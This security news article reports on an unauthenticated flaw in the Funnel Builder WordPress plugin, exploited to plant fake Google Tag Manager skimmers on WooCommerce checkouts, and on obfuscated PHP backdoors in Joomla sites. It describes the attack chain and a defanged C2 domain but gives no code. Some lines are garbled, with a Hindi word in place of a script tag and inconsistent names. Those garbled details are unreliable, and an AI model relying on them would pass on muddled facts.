A serious security vulnerability affecting the Funnel Builder plugin for WordPress has come under active exploitation to inject malicious JavaScript code into WooCommerce checkout pages with the goal of stealing payment data.
Details of the activity were published by SanSec this week. The vulnerability currently has no official CVE identifier. This affects all versions of the plugin before 3.15.0.3. It is used in over 40,000 WooCommerce stores.
The Dutch e-commerce security company said the flaw allows unauthenticated attackers to inject arbitrary JavaScript into each of the store’s checkout pages. FunnelKit, which maintains Funnel Builder, has released a patch for the vulnerability in version 3.15.0.3.
“Attackers are embedding fake Google Tag Manager scripts in the plugin’s ‘External Scripts’ setting,” it says. “The injected code looks like normal analytics next to the store’s actual tag, but loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses from checkout.”
According to Sansec, Funnel Builder includes a publicly exposed checkout endpoint that allows choosing the type of internal method to run the incoming request. However, older versions were designed such that they never checked the caller’s permissions or limited which methods were allowed to be invoked.
A bad actor could exploit this flaw by issuing an unauthenticated request that accesses an unspecified internal method that writes attacker-controlled data directly to the plugin’s global settings. The added code snippet is then injected into each Funnel Builder checkout page.
As a result, an attacker can <स्क्रिप्ट> Tag that triggers on every checkout transaction in a vulnerable WordPress site.
In at least one case, Sansec said it observed a payload posing as the Google Tag Manager (GTM) loader to launch JavaScript hosted on a remote domain. This subsequently opens a WebSocket connection to the attacker’s command-and-control (C2) server (“wss://protect-wss”[.]com/ws”) to retrieve a skimmer that is tailored to the victim’s storefront.
The ultimate goal of the attack is to steal credit card numbers, CVVs, billing addresses and other personal information that may be entered by site visitors at the time of checkout. Site owners are advised to update the Funnel Builder plugin to the latest version and review Settings > Checkout > External Scripts for anything unfamiliar and remove it.
“Disguising skimmers as Google Analytics or Tag Manager code is a recurring MazeCart pattern, as reviewers tend to give a cursory glance at anything that looks like a familiar tracking tag,” Sansek said.
The disclosure comes just weeks after Sucuri detailed a campaign in which Joomla websites were being backdoored with heavily obfuscated PHP code to contact attacker-controlled C2 servers, receive and process instructions sent by operators, and serve spammy content to visitors and search engines without the site owner’s knowledge. The ultimate objective is to take advantage of the sites’ reputation to insert spam.
“The script acts as a remote loader,” said security researcher Pooja Srivastava. “It contacts an external server, sends information about the infected website, and waits for instructions. The response from the remote server determines what content the infected site should serve.”
“This approach allows attackers to change the behavior of the compromised website at any time without having to modify local files again. The attacker can inject spam product links, redirect visitors, or dynamically display malicious pages.”
